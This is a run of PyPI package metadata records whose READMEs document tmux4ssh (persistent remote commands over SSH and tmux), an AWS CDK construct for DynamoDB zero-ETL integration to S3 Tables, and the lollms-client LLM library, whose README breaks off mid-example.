└── task_a1b2c3d4_20260120_110000.log # Log from --new session ``` The lock file contains information about the running command: ``` cmd: spectre simulation.scs started: Mon Jan 20 10:00:00 UTC 2026 session: remote_task log: ~/tmux_ssh_logs/remote_task_20260120_100000.log ``` ## Command Line Options | Option | Description | |--------|-------------| | `-H, --host` | Remote hostname | | `-U, --user` | Remote username | | `-p, --port` | SSH port (default: 22) | | `-t, --timeout` | Max seconds to stream (default: unlimited) | | `-i, --idle-timeout` | Exit if no output for N seconds (default: 3600) | | `-n, --new` | Create a new unique tmux session (inherits cwd, auto-terminates) | | `-f, --force` | Force execution, kill any running command | | `-k, --kill [SESSION]` | Kill running command (auto-detect if not specified) | | `-y, --yes` | Skip confirmation prompt (for --kill) | | `-a, --attach [SESSION]` | Attach to session (auto-detect if not specified) | | `-l, --list` | List all running commands/sessions | | `--cleanup` | Clean up idle task_* sessions (keeps remote_task) | | `--auto` | Auto-create new session if command already running (default: true) | | `--no-auto` | Disable auto-create, block if command already running | | `-C, --clear` | Clear stored credentials | ## Exit Codes | Code | Meaning | |------|---------| | 0 | Command completed successfully | | 1 | Connection or execution error | | 2 | Timeout reached, command still running | | 3 | Blocked by running command | ## FAQ ### Will closing my laptop or losing internet kill my remote task? **No.** Your remote command continues running safely in the tmux session on the server. ``` ┌─────────────────┐ ┌─────────────────────────────────────┐ │ Your Laptop │ SSH │ Remote Server │ │ │ ──────► │ │ │ tmux4ssh │ │ tmux session (remote_task) │ │ (streaming │ ◄────── │ └── your command running │ │ output only) │ tail │ └── output → log file │ └─────────────────┘ └─────────────────────────────────────┘ ``` When you close your laptop or lose connection: 1. The SSH connection drops 2. The local `tmux4ssh` process terminates 3. **The remote command keeps running** inside the tmux session 4. Output continues to be written to the log file When you reconnect later, use `tmux4ssh --attach` to resume streaming. ### What happens if I press Ctrl+C locally? **Ctrl+C only stops the local streaming process.** The remote command continues running. This is safe and expected behavior — you can press Ctrl+C anytime to stop watching the output without affecting the remote task. To resume streaming later: ```bash tmux4ssh --attach ``` ### How do I actually terminate a running remote command? Use the `--kill` option: ```bash # Kill command in auto-detected session tmux4ssh --kill # Kill command in a specific session tmux4ssh --kill task_a1b2c3d4 ``` Alternative options: ```bash # Use --force to kill and run a new command tmux4ssh --force "new_command" # SSH directly and kill the process ssh user@host pkill -f "your_command_pattern" # SSH directly and attach to tmux, then Ctrl+C ssh user@host tmux attach -t remote_task # Now Ctrl+C will kill the command inside tmux ``` ## Development ### Running Tests ```bash # Run all tests (unit tests only by default) pytest # Run unit tests only pytest -m unit # Run integration tests (requires live SSH connection) pytest -m integration # Run with coverage report pytest --cov=tmux_ssh --cov-report=html ``` ### Code Quality ```bash # Run linter ruff check src tests # Run type checker mypy src tests # Run all pre-commit hooks pre-commit run --all-files ``` ## Project Structure ``` tmux_ssh/ ├── src/ │ └── tmux_ssh/ │ ├── __init__.py │ ├── client.py # Main TmuxSSHClient class │ └── cli.py # Command-line interface ├── tests/ │ ├── conftest.py # Test fixtures │ ├── test_unit.py # Unit tests (mocked) │ └── test_integration.py # Integration tests (live SSH) ├── pyproject.toml ├── .pre-commit-config.yaml └── README.md ``` ## License Apache 2.0 --- *Spectre® is a registered trademark of Cadence Design Systems, Inc. All other trademarks are the property of their respective owners.*
text/markdown
Gaofeng Fan
null
null
null
Apache 2.0
ssh, tmux, remote, command, automation
[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: Apache Software License", "Operating System :: POSIX", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", ...
[]
null
null
>=3.10
[]
[]
[]
[ "paramiko>=3.0.0", "keyring>=24.0.0", "pytest>=8.0.0; extra == \"dev\"", "pytest-cov>=4.0.0; extra == \"dev\"", "pytest-mock>=3.12.0; extra == \"dev\"", "ruff>=0.1.0; extra == \"dev\"", "mypy>=1.8.0; extra == \"dev\"", "pre-commit>=3.6.0; extra == \"dev\"", "types-paramiko>=3.0.0; extra == \"dev\"" ...
[]
[]
[]
[ "Homepage, https://github.com/circuitmuggle/tmux4ssh", "Repository, https://github.com/circuitmuggle/tmux4ssh" ]
twine/6.2.0 CPython/3.12.10
2026-02-19T22:10:40.282645
tmux4ssh-0.1.0.tar.gz
26,483
94/b7/428e4c2ef8d7b374639860c5cb030aef430ddb714b97a4ec1fa6a74ead1d/tmux4ssh-0.1.0.tar.gz
source
sdist
null
false
7ee24e93e3da4c0e6a1413930eca5ae3
345e8f6bdda3c3d666c2d924d0e8a476fbbb220c070db508a8ae86b4ed93e6ef
94b7428e4c2ef8d7b374639860c5cb030aef430ddb714b97a4ec1fa6a74ead1d
null
[ "LICENSE" ]
235
2.1
dynamodb-zero-etl-s3tables
0.1.7
AWS CDK L3 construct that creates a complete zero-ETL integration from Amazon DynamoDB to Amazon S3 Tables (Apache Iceberg)
# dynamodb-zero-etl-s3tables [![npm version](https://badge.fury.io/js/dynamodb-zero-etl-s3tables.svg)](https://www.npmjs.com/package/dynamodb-zero-etl-s3tables) [![PyPI version](https://badge.fury.io/py/dynamodb-zero-etl-s3tables.svg)](https://pypi.org/project/dynamodb-zero-etl-s3tables/) [![NuGet version](https://img.shields.io/nuget/v/LeeroyHannigan.CDK.DynamoDbZeroEtlS3Tables.svg)](https://www.nuget.org/packages/LeeroyHannigan.CDK.DynamoDbZeroEtlS3Tables/) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT) [![jsii](https://img.shields.io/badge/jsii-compatible-brightgreen.svg)](https://github.com/aws/jsii) [![stability: experimental](https://img.shields.io/badge/stability-experimental-orange.svg)](https://www.npmjs.com/package/dynamodb-zero-etl-s3tables) An AWS CDK L3 construct that wires up a complete **zero-ETL integration** from **Amazon DynamoDB** to **Amazon S3 Tables** (Apache Iceberg) — in a single line of code. > **Zero-ETL** eliminates the need to build and maintain ETL pipelines. Data flows automatically from your DynamoDB table into Iceberg tables on S3, ready for analytics with Athena, Redshift, EMR, and more. ## Why this construct? Setting up DynamoDB zero-ETL to S3 Tables manually requires **7+ resources** across DynamoDB, S3 Tables, IAM, Glue, and custom resources — each with specific permissions, dependencies, and ordering constraints. One misconfigured policy and the integration silently fails. This construct handles all of that for you: ``` ┌──────────────┐ ┌──────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ DynamoDB │────────▶│ AWS Glue │────────▶│ S3 Tables │ │ Table │ zero │ Integration │ write │ (Iceberg) │ │ │ ETL │ │ │ │ └──────────────┘ └──────────────────┘ └─────────────────┘ │ │ │ ▼ ▼ ▼ Resource Policy Catalog Policy Table Bucket (Glue export) (Custom Resource) IAM Target Role ``` **What gets created:** | Resource | Purpose | |----------|---------| | `AWS::S3Tables::TableBucket` | Iceberg-native storage for your analytics data | | `AWS::IAM::Role` | Least-privilege role for Glue to write to S3 Tables and catalog | | `AWS::Glue::Integration` | The zero-ETL integration connecting source to target | | `AWS::Glue::IntegrationResourceProperty` | Wires the target IAM role to the integration | | `Custom::AWS` (AwsCustomResource) | Sets the Glue Data Catalog resource policy (no CloudFormation support) | | DynamoDB Resource Policy | Allows Glue to export and describe the source table | ## Installation **TypeScript/JavaScript:** ```bash npm install dynamodb-zero-etl-s3tables ``` **Python:** ```bash pip install dynamodb-zero-etl-s3tables ``` **Java (Maven):** ```xml <dependency> <groupId>io.github.leeroyhannigan</groupId> <artifactId>dynamodb-zero-etl-s3tables</artifactId> </dependency> ``` **.NET:** ```bash dotnet add package LeeroyHannigan.CDK.DynamoDbZeroEtlS3Tables ``` ## Quick Start ```python import { DynamoDbZeroEtlToS3Tables } from 'dynamodb-zero-etl-s3tables'; import * as dynamodb from 'aws-cdk-lib/aws-dynamodb'; const table = new dynamodb.Table(this, 'Table', { tableName: 'Orders', partitionKey: { name: 'PK', type: dynamodb.AttributeType.STRING }, sortKey: { name: 'SK', type: dynamodb.AttributeType.STRING }, billingMode: dynamodb.BillingMode.PAY_PER_REQUEST, pointInTimeRecovery: true, }); new DynamoDbZeroEtlToS3Tables(this, 'ZeroEtl', { table, tableBucketName: 'orders-iceberg-bucket', }); ``` That's it. Your DynamoDB data will automatically replicate to Iceberg tables on S3. ## Props | Property | Type | Required | Default | Description | |----------|------|----------|---------|-------------| | `table` | `dynamodb.Table` | Yes | — | DynamoDB table with an explicit `tableName` and PITR enabled | | `tableBucketName` | `string` | Yes | — | Name for the S3 Table Bucket | | `integrationName` | `string` | No | `'ddb-to-s3tables'` | Name for the Glue zero-ETL integration | ## Exposed Properties All key resources are exposed as public properties for extension: | Property | Type | Description | |----------|------|-------------| | `tableBucket` | `s3tables.CfnTableBucket` | The S3 Table Bucket for Iceberg storage | | `targetRole` | `iam.Role` | The IAM role Glue uses to write to the target | | `integration` | `glue.CfnIntegration` | The Glue zero-ETL integration | ## Customization Examples ### Add custom permissions to the target role ```python const zeroEtl = new DynamoDbZeroEtlToS3Tables(this, 'ZeroEtl', { table, tableBucketName: 'my-bucket', }); zeroEtl.targetRole.addToPolicy(new iam.PolicyStatement({ actions: ['s3:GetObject'], resources: ['arn:aws:s3:::my-other-bucket/*'], })); ``` ### Configure Iceberg file maintenance ```python zeroEtl.tableBucket.unreferencedFileRemoval = { status: 'Enabled', unreferencedDays: 10, noncurrentDays: 30, }; ``` ### Tag the integration ```python zeroEtl.integration.tags = [ { key: 'Environment', value: 'production' }, { key: 'Team', value: 'analytics' }, ]; ``` ## Prerequisites Your DynamoDB table **must** have: 1. **An explicit `tableName`** — auto-generated names (CloudFormation tokens) are not supported. The construct validates this at synth time. 2. **Point-in-time recovery (PITR) enabled** — required by the zero-ETL integration for data export. The construct validates this at synth time. If either requirement is not met, the construct throws a descriptive error during synthesis. ## How It Works 1. **S3 Table Bucket** is created as the Iceberg-native target for your data 2. **IAM Role** is created with least-privilege permissions for S3 Tables, Glue Catalog, CloudWatch, and Logs 3. **DynamoDB Resource Policy** is set on your table, allowing the Glue service to export data 4. **Glue Catalog Resource Policy** is applied via a custom resource (CloudFormation doesn't support this natively) 5. **Integration Resource Property** wires the IAM role to the target catalog 6. **Glue Integration** is created, connecting your DynamoDB table to the S3 Tables catalog All resources are created with correct dependency ordering to ensure a successful single-deploy experience. ## Querying Your Data Once the integration is active, your DynamoDB data is available as Iceberg tables. Query with Amazon Athena: ```sql SELECT * FROM "s3tablescatalog/my-bucket"."namespace"."table_name" LIMIT 10; ``` ## Security * All IAM permissions follow **least-privilege** principles * S3 Tables permissions are scoped to the specific bucket and sub-resources * Glue catalog permissions are scoped to the account's catalog and databases * DynamoDB resource policy uses `aws:SourceAccount` and `aws:SourceArn` conditions * CloudWatch metrics are conditioned on the `AWS/Glue/ZeroETL` namespace ## Contributing Contributions, issues, and feature requests are welcome! * [GitHub Repository](https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables) * [Issue Tracker](https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables/issues) ## License This project is licensed under the [MIT License](https://opensource.org/licenses/MIT). ## Author **Lee Hannigan** — [GitHub](https://github.com/LeeroyHannigan)
text/markdown
Lee Hannigan<lhnng@amazon.com>
null
null
null
MIT
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables.git
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.238.0", "constructs<11.0.0,>=10.5.1", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/LeeroyHannigan/dynamodb-zero-etl-s3tables.git" ]
twine/6.1.0 CPython/3.14.2
2026-02-19T22:10:39.353910
dynamodb_zero_etl_s3tables-0.1.7.tar.gz
182,792
b5/c3/0092d1375b1cbb9825c96b98fed0d18f0a855ef566982848a0d9076b6afa/dynamodb_zero_etl_s3tables-0.1.7.tar.gz
source
sdist
null
false
9a56d30d0860e28544922f1cc0cb23fa
be3d8632103550e5d1ad7ef68f8faa3886c7415ddcdd488292c2bda059e31f65
b5c30092d1375b1cbb9825c96b98fed0d18f0a855ef566982848a0d9076b6afa
null
[]
222
2.4
lollms-client
1.11.7
A client library for LoLLMs generate endpoint
# LoLLMs Client Library [![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) [![PyPI version](https://badge.fury.io/py/lollms_client.svg)](https://badge.fury.io/py/lollms_client) [![Python Versions](https://img.shields.io/pypi/pyversions/lollms_client.svg)](https://pypi.org/project/lollms-client/) [![Downloads](https://static.pepy.tech/personalized-badge/lollms-client?period=total&units=international_system&left_color=grey&right_color=green&left_text=Downloads)](https://pepy.tech/project/lollms-client) [![Documentation - Usage](https://img.shields.io/badge/docs-Usage%20Guide-brightgreen)](DOC_USE.md) [![Documentation - Developer](https://img.shields.io/badge/docs-Developer%20Guide-blue)](DOC_DEV.md) [![GitHub stars](https://img.shields.io/github/stars/ParisNeo/lollms_client.svg?style=social&label=Star&maxAge=2592000)](https://github.com/ParisNeo/lollms_client/stargazers/) [![GitHub issues](https://img.shields.io/github/issues/ParisNeo/lollms_client.svg)](https://github.com/ParisNeo/lollms_client/issues) **`lollms_client`** is a powerful and flexible Python library designed to simplify interactions with the **LoLLMs (Lord of Large Language Models)** ecosystem and various other Large Language Model (LLM) backends. It provides a unified API for text generation, multimodal operations (text-to-image, text-to-speech, etc.), and robust function calling through the Model Context Protocol (MCP). Whether you're connecting to a remote LoLLMs server, an Ollama instance, the OpenAI API, or running models locally using GGUF (via `llama-cpp-python` or a managed `llama.cpp` server), Hugging Face Transformers, or vLLM, `lollms-client` offers a consistent and developer-friendly experience. ## Key Features * 🔌 **Versatile Binding System:** Seamlessly switch between different LLM backends (LoLLMs, Ollama, OpenAI, Llama.cpp, Transformers, vLLM, OpenLLM, Gemini, Claude, Groq, OpenRouter, Hugging Face Inference API) using a unified `llm_binding_config` dictionary for all parameters. * 🗣️ **Comprehensive Multimodal Support:** Interact with models capable of processing images and generate various outputs like speech (TTS), video (TTV), and music (TTM). * 🎨 **Advanced Image Generation and Editing:** A new `diffusers` binding provides powerful text-to-image capabilities. It supports a wide range of models from Hugging Face and Civitai, including specialized models like `Qwen-Image-Edit` for single-image editing and the cutting-edge `Qwen-Image-Edit-2509` for **multi-image fusion, pose transfer, and character swapping**. * 🖼️ **Selective Image Activation:** Control which images in a message are active and sent to the model, allowing for fine-grained multimodal context management without deleting the original data. * 🤖 **Agentic Workflows with MCP:** Empower LLMs to act as sophisticated agents, breaking down complex tasks, selecting and executing external tools (e.g., internet search, code interpreter, file I/O, image generation) through the Model Context Protocol (MCP) using a robust "observe-think-act" loop. * 🎭 **Personalities as Agents:** Personalities can now define their own set of required tools (MCPs) and have access to static or dynamic knowledge bases (`data_source`), turning them into self-contained, ready-to-use agents. * 🚀 **Streaming & Callbacks:** Efficiently handle real-time text generation with customizable callback functions across all generation methods, including during agentic (MCP) interactions. * 📑 **Long Context Processing:** The `long_context_processing` method (formerly `sequential_summarize`) intelligently chunks and synthesizes texts that exceed the model's context window, suitable for summarization or deep analysis. * 📝 **Advanced Structured Content Generation:** Reliably generate structured JSON output from natural language prompts using the `generate_structured_content` helper method, enforcing a specific schema. * 💬 **Advanced Discussion Management:** Robustly manage conversation histories with `LollmsDiscussion`, featuring branching, context exporting, and automatic pruning. * 🧠 **Persistent Memory & Data Zones:** `LollmsDiscussion` now supports multiple, distinct data zones (`user_data_zone`, `discussion_data_zone`, `personality_data_zone`) and a long-term `memory` field. This allows for sophisticated context layering and state management, enabling agents to learn and remember over time. * ✍️ **Structured Memorization:** The `memorize()` method analyzes a conversation to extract its essence (e.g., a problem and its solution), creating a structured "memory" with a title and content. These memories are stored and can be explicitly loaded into the AI's context, providing a more robust and manageable long-term memory system. * 📊 **Detailed Context Analysis:** The `get_context_status()` method provides a rich, detailed breakdown of the prompt context, showing the content and token count for each individual component (system prompt, data zones, message history). * ⚙️ **Standardized Configuration Management:** A unified dictionary-based system (`llm_binding_config`) to configure any binding in a consistent manner. * 🧩 **Extensible:** Designed to easily incorporate new LLM backends and modality services, including custom MCP toolsets. * 📝 **High-Level Operations:** Includes convenience methods for complex tasks like sequential summarization and deep text analysis directly within `LollmsClient`. ## Installation You can install `lollms_client` directly from PyPI: ```bash pip install lollms-client ``` This will install the core library. Some bindings may require additional dependencies (e.g., `llama-cpp-python`, `torch`, `transformers`, `ollama`, `vllm`, `Pillow` for image utilities, `docling` for document parsing). The library attempts to manage these using `pipmaster`, but for complex dependencies (especially those requiring compilation like `llama-cpp-python` with GPU support), manual installation might be preferred. ## Core Generation Methods The `LollmsClient` provides several methods for generating text, catering to different use cases. ### Basic Text Generation (`generate_text`) This is the most straightforward method for generating a response based on a simple prompt. ```python from lollms_client import LollmsClient, MSG_TYPE from ascii_colors import ASCIIColors import os # Callback for streaming output def simple_streaming_callback(chunk: str, msg_type: MSG_TYPE, params=None, metadata=None) -> bool: if msg_type == MSG_TYPE.MSG_TYPE_CHUNK: print(chunk, end="", flush=True) elif msg_type == MSG_TYPE.MSG_TYPE_EXCEPTION: ASCIIColors.error(f"\nStreaming Error: {chunk}") return True # True to continue streaming try: # Initialize client to connect to a LoLLMs server. # All binding-specific parameters now go into the 'llm_binding_config' dictionary. lc = LollmsClient( llm_binding_name="lollms", # This is the default binding llm_binding_config={ "host_address": "http://localhost:9642", # Default port for LoLLMs server # "service_key": "your_lollms_api_key_here" # Get key from LoLLMs UI -> User Settings if security is enabled # "verify_ssl_certificate": True #if false the ssl certifcate verification will be ignored (only used when using https in lollms service address) } ) prompt = "Tell me a fun fact about space." ASCIIColors.yellow(f"Prompt: {prompt}") # Generate text with streaming ASCIIColors.green("Streaming Response:") response_text = lc.generate_text( prompt, n_predict=100, stream=True, streaming_callback=simple_streaming_callback ) print("\n--- End of Stream ---") # The 'response_text' variable will contain the full concatenated text # if streaming_callback returns True throughout. if isinstance(response_text, str): ASCIIColors.cyan(f"\nFull streamed text collected: {response_text[:100]}...") elif isinstance(response_text, dict) and "error" in response_text: ASCIIColors.error(f"Error during generation: {response_text['error']}") except ValueError as ve: ASCIIColors.error(f"Initialization Error: {ve}") ASCIIColors.info("Ensure a LoLLMs server is running or configure another binding.") except ConnectionRefusedError: ASCIIColors.error("Connection refused. Is the LoLLMs server running at http://localhost:9642?") except Exception as e: ASCIIColors.error(f"An unexpected error occurred: {e}") ``` ### Generating from Message Lists (`generate_from_messages`) For more complex conversational interactions, you can provide the LLM with a list of messages, similar to the OpenAI Chat Completion API. This allows you to define roles (system, user, assistant) and build multi-turn conversations programmatically. ```python from lollms_client import LollmsClient, MSG_TYPE from ascii_colors import ASCIIColors import os def streaming_callback_for_messages(chunk: str, msg_type: MSG_TYPE, params=None, metadata=None) -> bool: if msg_type == MSG_TYPE.MSG_TYPE_CHUNK: print(chunk, end="", flush=True) return True try: # Example for an Ollama binding # Ensure you have Ollama installed and model 'llama3' pulled (e.g., ollama pull llama3) lc = LollmsClient( llm_binding_name="ollama", llm_binding_config={ "model_name": "llama3", "host_address": "http://localhost:11434" # Default Ollama address } ) # Define the conversation history as a list of messages messages = [ {"role": "system", "content": "You are a helpful assistant that specializes in programming."}, {"role": "user", "content": "Hello, what's your name?"}, {"role": "assistant", "content": "I am an AI assistant created by Google."}, {"role": "user", "content": "Can you explain recursion in Python?"} ] ASCIIColors.yellow("\nGenerating response from messages:") response_text = lc.generate_from_messages( messages=messages, n_predict=200, stream=True, streaming_callback=streaming_callback_for_messages ) print("\n--- End of Message Stream ---") ASCIIColors.cyan(f"\nFull collected response: {response_text[:150]}...") except Exception as e: ASCIIColors.error(f"Error during message generation: {e}") ``` ### Advanced Structured Content Generation (`generate_structured_content`) The `generate_structured_content` method is a powerful utility for forcing an LLM's output into a specific JSON format. It's ideal for extracting information, getting consistent tool parameters, or any task requiring reliable, machine-readable output. ```python from lollms_client import LollmsClient from ascii_colors import ASCIIColors import json import os try: # Using Ollama as an example binding lc = LollmsClient(llm_binding_name="ollama", llm_binding_config={"model_name": "llama3"}) text_block = "John Doe is a 34-year-old software engineer from New York. He loves hiking and Python programming." # Define the exact JSON structure you want output_template = { "full_name": "string", "age": "integer", "profession": "string", "city": "string", "hobbies": ["list", "of", "strings"] # Example of a list in schema } ASCIIColors.yellow(f"\nExtracting structured data from: '{text_block}'") ASCIIColors.yellow(f"Using schema: {json.dumps(output_template)}") # Generate the structured data extracted_data = lc.generate_structured_content( prompt=f"Extract the relevant information from the following text:\n\n{text_block}", schema=output_template, # Note: parameter is 'schema' temperature=0.0 # Use low temperature for deterministic structured output ) if extracted_data: ASCIIColors.green("\nExtracted Data (JSON):") print(json.dumps(extracted_data, indent=2)) else: ASCIIColors.error("\nFailed to extract structured data.") except Exception as e: ASCIIColors.error(f"An error occurred during structured content generation: {e}") ``` ## Advanced Discussion Management The `LollmsDiscussion` class is a core component for managing conversational state, including message history, long-term memory, and various context zones. ### Basic Chat with `LollmsDiscussion` For general conversational agents that need to maintain context across turns, `LollmsDiscussion` simplifies the process. It automatically handles message formatting, history management, and context window limitations. ```python from lollms_client import LollmsClient, LollmsDiscussion, MSG_TYPE, LollmsDataManager from ascii_colors import ASCIIColors import os import tempfile # Initialize LollmsClient try: lc = LollmsClient( llm_binding_name="ollama", llm_binding_config={ "model_name": "llama3", "host_address": "http://localhost:11434" } ) except Exception as e: ASCIIColors.error(f"Failed to initialize LollmsClient for discussion: {e}") exit() # Create a new discussion. For persistent discussions, pass a db_manager. # Using a temporary directory for the database for this example's simplicity with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "discussion_db.sqlite" db_manager = LollmsDataManager(f"sqlite:///{db_path}") discussion_id = "basic_chat_example" discussion = db_manager.get_discussion(lc, discussion_id) if not discussion: ASCIIColors.yellow(f"\nCreating new discussion '{discussion_id}'...") discussion = LollmsDiscussion.create_new( lollms_client=lc, db_manager=db_manager, id=discussion_id, autosave=True # Important for persistence ) discussion.system_prompt = "You are a friendly and helpful AI." discussion.commit() else: ASCIIColors.green(f"\nLoaded existing discussion '{discussion_id}'.") # Define a simple callback for streaming def chat_callback(chunk: str, msg_type: MSG_TYPE, **kwargs) -> bool: if msg_type == MSG_TYPE.MSG_TYPE_CHUNK: print(chunk, end="", flush=True) return True try: ASCIIColors.cyan("> User: Hello, how are you today?") response = discussion.chat( user_message="Hello, how are you today?", streaming_callback=chat_callback ) print("\n") # Newline after stream finishes ai_message = response['ai_message'] user_message = response['user_message'] ASCIIColors.green(f"< Assistant (Full): {ai_message.content[:100]}...") # Now, continue the conversation ASCIIColors.cyan("\n> User: Can you recommend a good book?") response = discussion.chat( user_message="Can you recommend a good book?", streaming_callback=chat_callback ) print("\n") # You can inspect the full message history ASCIIColors.magenta("\n--- Discussion History (last 3 messages) ---") for msg in discussion.get_messages()[-3:]: print(f"[{msg.sender.capitalize()}]: {msg.content[:50]}...") except Exception as e: ASCIIColors.error(f"An error occurred during discussion chat: {e}") ``` ### Building Stateful Agents with Memory and Data Zones The `LollmsDiscussion` class provides a sophisticated system for creating stateful agents that can remember information across conversations. This is achieved through a layered system of "context zones" that are automatically combined into the AI's system prompt. #### Understanding the Context Zones The AI's context is more than just chat history. It's built from several distinct components, each with a specific purpose: * **`system_prompt`**: The foundational layer defining the AI's core identity, persona, and primary instructions. * **`memory`**: The AI's long-term, persistent memory. It stores key facts about the user or topics, built up over time using the `memorize()` method. * **`user_data_zone`**: Holds session-specific information about the user's current state or goals (e.g., "User is currently working on 'file.py'"). * **`discussion_data_zone`**: Contains state or meta-information about the current conversational task (e.g., "Step 1 of the plan is complete"). * **`personality_data_zone`**: A knowledge base or set of rules automatically injected from a `LollmsPersonality`'s `data_source`. * **`pruning_summary`**: An automatic, AI-generated summary of the oldest messages in a very long chat, used to conserve tokens without losing the gist of the early conversation. The `get_context_status()` method is your window into this system, showing you exactly how these zones are combined and how many tokens they consume. Let's see this in action with a "Personal Assistant" agent that learns about the user over time. ```python from lollms_client import LollmsClient, LollmsDataManager, LollmsDiscussion, MSG_TYPE from ascii_colors import ASCIIColors import json import tempfile import os # --- 1. Setup a persistent database for our discussion --- with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "my_assistant.db" db_manager = LollmsDataManager(f"sqlite:///{db_path}") try: lc = LollmsClient(llm_binding_name="ollama", llm_binding_config={"model_name": "llama3"}) except Exception as e: ASCIIColors.error(f"Failed to initialize LollmsClient for stateful agent: {e}") exit() # Try to load an existing discussion or create a new one discussion_id = "user_assistant_chat_1" discussion = db_manager.get_discussion(lc, discussion_id) if not discussion: ASCIIColors.yellow("Creating a new discussion for stateful agent...") discussion = LollmsDiscussion.create_new( lollms_client=lc, db_manager=db_manager, id=discussion_id, autosave=True # Important for persistence ) # Let's preset some data in different zones discussion.system_prompt = "You are a helpful Personal Assistant." discussion.user_data_zone = "User's Name: Alex\nUser's Goal: Learn about AI development." discussion.commit() else: ASCIIColors.green("Loaded existing discussion for stateful agent.") def run_chat_turn(prompt: str): """Helper function to run a single chat turn and print details.""" ASCIIColors.cyan(f"\n> User: {prompt}") # --- A. Check context status BEFORE the turn using get_context_status() --- ASCIIColors.magenta("\n--- Context Status (Before Generation) ---") status = discussion.get_context_status() print(f"Max Tokens: {status.get('max_tokens')}, Current Tokens: {status.get('current_tokens')}") # Print the system context details if 'system_context' in status['zones']: sys_ctx = status['zones']['system_context'] print(f" - System Context Tokens: {sys_ctx['tokens']}") # The 'breakdown' shows the individual zones that were combined for name, content in sys_ctx.get('breakdown', {}).items(): # For brevity, show only first line of content print(f" -> Contains '{name}': {content.split(os.linesep)}...") # Print the message history details if 'message_history' in status['zones']: msg_hist = status['zones']['message_history'] print(f" - Message History Tokens: {msg_hist['tokens']} ({msg_hist['message_count']} messages)") print("------------------------------------------") # --- B. Run the chat --- ASCIIColors.green("\n< Assistant:") response = discussion.chat( user_message=prompt, streaming_callback=lambda chunk, type, **k: print(chunk, end="", flush=True) if type==MSG_TYPE.MSG_TYPE_CHUNK else None ) print() # Newline after stream # --- C. Trigger memorization to update the 'memory' zone --- ASCIIColors.yellow("\nTriggering memorization process...") discussion.memorize() discussion.commit() # Save the new memory to the DB ASCIIColors.yellow("Memorization complete.") # --- Run a few turns --- run_chat_turn("Hi there! Can you recommend a good Python library for building web APIs?") run_chat_turn("That sounds great. By the way, my favorite programming language is Rust, I find its safety features amazing.") run_chat_turn("What was my favorite programming language again?") # --- Final Inspection of Memory --- ASCIIColors.magenta("\n--- Final Context Status ---") status = discussion.get_context_status() print(f"Max Tokens: {status.get('max_tokens')}, Current Tokens: {status.get('current_tokens')}") if 'system_context' in status['zones']: sys_ctx = status['zones']['system_context'] print(f" - System Context Tokens: {sys_ctx['tokens']}") for name, content in sys_ctx.get('breakdown', {}).items(): # Print the full content of the memory zone to verify it was updated if name == 'memory': ASCIIColors.yellow(f" -> Full '{name}' content:\n{content}") else: print(f" -> Contains '{name}': {content.split(os.linesep)}...") print("------------------------------------------") ``` #### How it Works: 1. **Persistence & Initialization:** The `LollmsDataManager` saves and loads the discussion. We initialize the `system_prompt` and `user_data_zone` to provide initial context. 2. **`get_context_status()`:** Before each generation, we call this method. The output shows a `system_context` block with a token count for all combined zones and a `breakdown` field that lets us see the content of each individual zone that contributed to it. 3. **`memorize()`:** After the user mentions their favorite language, `memorize()` is called. The LLM analyzes the last turn, identifies this new, important fact, and appends it to the `discussion.memory` zone. 4. **Recall:** In the final turn, when asked to recall the favorite language, the AI has access to the updated `memory` content within its system context and can correctly answer "Rust". This demonstrates true long-term, stateful memory. ### Managing Multimodal Context: Activating and Deactivating Images When working with multimodal models, you can now control which images in a message are active and sent to the model. This is useful for focusing the AI's attention, saving tokens on expensive vision models, or allowing a user to correct which images are relevant. This is managed at the `LollmsMessage` level using the `toggle_image_activation()` method. ```python from lollms_client import LollmsClient, LollmsDiscussion, LollmsDataManager, MSG_TYPE from ascii_colors import ASCIIColors import base64 from pathlib import Path import os import tempfile # Helper to create a dummy image b64 string def create_dummy_image(text, output_dir): try: from PIL import Image, ImageDraw, ImageFont except ImportError: ASCIIColors.warning("Pillow not installed. Skipping image example.") return None # Try to find a common font, otherwise use default font_path = Path("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf") # Common Linux path if not font_path.exists(): font_path = Path("/Library/Fonts/Arial.ttf") # Common macOS path if not font_path.exists(): font_path = Path("C:/Windows/Fonts/arial.ttf") # Common Windows path try: font = ImageFont.truetype(str(font_path), 15) except (IOError, OSError): font = ImageFont.load_default() # Fallback to default if font not found img = Image.new('RGB', (200, 50), color = (73, 109, 137)) d = ImageDraw.Draw(img) d.text((10,10), text, fill=(255,255,0), font=font) temp_file = Path(output_dir) / f"temp_img_{text.replace(' ', '_')}.png" img.save(temp_file, "PNG") b64 = base64.b64encode(temp_file.read_bytes()).decode('utf-8') temp_file.unlink() # Clean up temporary file return b64 # --- 1. Setup --- try: # Llava is a good multi-modal model for Ollama # Ensure Ollama is running and 'llava' model is pulled (e.g., ollama pull llava) lc = LollmsClient(llm_binding_name="ollama", llm_binding_config={"model_name": "llava"}) except Exception as e: ASCIIColors.warning(f"Failed to initialize LollmsClient for image example: {e}") ASCIIColors.warning("Skipping image activation example. Ensure Ollama is running and 'llava' model is pulled.") exit() with tempfile.TemporaryDirectory() as tmpdir: db_path = Path(tmpdir) / "image_discussion_db.sqlite" db_manager = LollmsDataManager(f"sqlite:///{db_path}") discussion = LollmsDiscussion.create_new(lollms_client=lc, db_manager=db_manager) # --- 2. Add a message with multiple images --- # Ensure Pillow is installed: pip install Pillow 